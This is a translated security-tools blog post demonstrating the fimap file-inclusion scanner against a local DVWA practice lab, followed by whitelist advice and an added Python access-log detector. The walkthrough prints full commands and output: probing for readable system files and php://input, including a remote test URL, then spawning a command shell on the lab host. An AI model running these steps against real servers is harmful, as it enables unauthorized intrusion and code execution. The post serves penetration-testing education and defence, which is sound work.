fimap, a File Inclusion Vulnerability Detection Tool - Security Tools Series

Author: DreamsonMa | Source: published 2019-04-22 10:18

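    For the underlying principle and how the attack works, see: Beginner's Guide: DVWA-1.9 All-Levels Tutorial, File Inclusion

    This post introduces a file inclusion penetration-testing tool: fimap

    Testing with fimap

    -u: specify the URL
    --cookie: set the cookie information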

    ➜  ~ fimap -u "http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php" --cookie="security=medium; PHPSESSID=b2i1bqt4mvna2faanq5jq5rm62" 
    fimap v.1.00_svn (My life for Aiur)
    :: Automatic LFI/RFI scanner and exploiter
    :: by Iman Karim (fimap.dev@gmail.com)
    
    SingleScan is testing URL: 'http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php'
    [02:11:10] [OUT] Inspecting URL 'http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php'...
    [02:11:10] [INFO] Fiddling around with URL...
    [02:11:10] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.56.101/DVWA/vulnerabilities/fi/?page=rySlWVBw' with Parameter 'page'.
    [02:11:10] [OUT] [PHP] Identifying Vulnerability 'http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php' with Parameter 'page'...
    [02:11:10] [INFO] Scriptpath received: 'D:\xampp\htdocs\DVWA\vulnerabilities\fi'
    [02:11:10] [INFO] Operating System is 'Windows'.
    [02:11:10] [INFO] Testing file 'c:\boot.ini'...
    [02:11:10] [INFO] Testing file 'c:\windows\win.ini'...
    [02:11:10] [INFO] Testing file 'php://input'...
    [02:11:10] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access.log'...
    [02:11:10] [WARN] HTTP Error 400: Bad Request
    [02:11:10] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access_log'...
    [02:11:10] [WARN] HTTP Error 400: Bad Request
    [02:11:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...
    ##################################################################################
    #[1] Possible PHP-File Inclusion                                                 #
    ##################################################################################
    #::REQUEST                                                                       #
    #  [URL]        http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file3.php    #
    #  [HEAD SENT]  Cookie                                                           #
    #::VULN INFO                                                                     #
    #  [GET PARAM]  page                                                             #
    #  [PATH]       D:\xampp\htdocs\DVWA\vulnerabilities\fi                          #
    #  [OS]         Windows                                                          #
    #  [TYPE]       Absolute Clean                                                   #
    #  [TRUNCATION] No Need. It's clean.                                             #
    #  [READABLE FILES]                                                              #
    #                   [0] c:\windows\win.ini                                       #
    #                   [1] php://input                                              #
    ##################################################################################
    

    -X: verify the vulnerability and obtain a shell

    ➜  ~ fimap -X
    fimap v.1.00_svn (My life for Aiur)
    :: Automatic LFI/RFI scanner and exploiter
    :: by Iman Karim (fimap.dev@gmail.com)
    
    ###########################
    #:: List of Domains ::    #
    ###########################
    #[1] 192.168.56.101       #
    #[q] Quit                 #
    ###########################
    Choose Domain: 1
    ###############################################################################################################
    #:: FI Bugs on '192.168.56.101' ::                                                                            #
    ###############################################################################################################
    #[1] URL: '/DVWA/vulnerabilities/fi/?page=file3.php' injecting file: 'php://input' using GET-param: 'page'    #
    #[q] Quit                                                                                                     #
    ###############################################################################################################
    Choose vulnerable script: 1
    [02:16:01] [INFO] Testing PHP-code injection thru POST...
    [02:16:01] [OUT] PHP Injection works! Testing if execution works...
    [02:16:01] [INFO] Testing execution thru 'popen[b64][win]'...
    [02:16:02] [OUT] Execution thru 'popen[b64][win]' works!
    ####################################################
    #:: Available Attacks - PHP and SHELL access ::    #
    ####################################################
    #[1] Spawn fimap shell                             #
    #[2] [Test Plugin] Show some info                  #
    #[q] Quit                                          #
    ####################################################
    Choose Attack: 1
    Please wait - Setting up shell (one request)...
    -------------------------------------------
    Welcome to fimap shell!
    Better don't start interactive commands! ;)
    Also remember that this is not a persistent shell.
    Every command opens a new shell and quits it after that!
    Enter 'q' to exit the shell.
    -------------------------------------------
    fishell@MAJX2:D:\xampp\htdocs\DVWA\vulnerabilities\fi$> whoami
    cn\majx2
    

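    See -h for more detailed options.

    How to defend

    1. Defend with a whitelist: ensure the page parameter can only ever be one of a fixed set of file names.
    2. If file inclusion is combined with file upload, an image file can be uploaded directly and its code executed, so the defense has to be comprehensive.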
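
A log check that complements the whitelist above, as an added example that is not part of the original post: it applies the same whitelist to the `page` parameter in access-log lines and labels everything else, which is how the probes in the fimap output (a random name, an absolute Windows path, `php://input`, a remote URL) surface on the server side. The whitelist contents, the log lines and the host `example.test` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed whitelist for `page`; only file3.php is named on the page itself.
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}

# Constructed Apache-style access log lines (sample data, not real traffic).
SAMPLE_LOG = """
192.168.56.1 - - [22/Apr/2019:02:11:09 +0800] "GET /DVWA/vulnerabilities/fi/?page=file3.php HTTP/1.1" 200 3801
192.168.56.1 - - [22/Apr/2019:02:11:10 +0800] "GET /DVWA/vulnerabilities/fi/?page=rySlWVBw HTTP/1.1" 200 3950
192.168.56.1 - - [22/Apr/2019:02:11:10 +0800] "GET /DVWA/vulnerabilities/fi/?page=c%3A%5Cwindows%5Cwin.ini HTTP/1.1" 200 4102
192.168.56.1 - - [22/Apr/2019:02:11:10 +0800] "POST /DVWA/vulnerabilities/fi/?page=php%3A%2F%2Finput HTTP/1.1" 200 3712
192.168.56.1 - - [22/Apr/2019:02:11:10 +0800] "GET /DVWA/vulnerabilities/fi/?page=http%3A%2F%2Fexample.test%2Ft HTTP/1.1" 200 3712
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return None for a whitelisted value, otherwise a label for the anomaly."""
    if value in ALLOWED_PAGES:
        return None
    v = value.lower()
    if re.match(r"[a-z]:[\\/]|/", v):          # drive-letter or rooted path
        return "absolute-path"
    if re.match(r"(https?|ftp)://", v):        # remote file inclusion attempt
        return "remote-url"
    if re.match(r"[a-z][a-z0-9.+-]+:", v):     # php://, data:, and similar
        return "stream-wrapper"
    if re.search(r"\.\.[\\/]", v):             # directory traversal
        return "traversal"
    return "not-allowlisted"

def scan(log_text, param="page"):
    """Return (client, label, decoded value) for each non-whitelisted value."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes, so encoded probes are compared in clear form.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            label = classify(value)
            if label:
                findings.append((line.split()[0], label, value))
    return findings

if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(f"{client}  {label:<16} {value}")
```
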


Article link: https://www.haomeiwen.com/subject/etiegqtx.html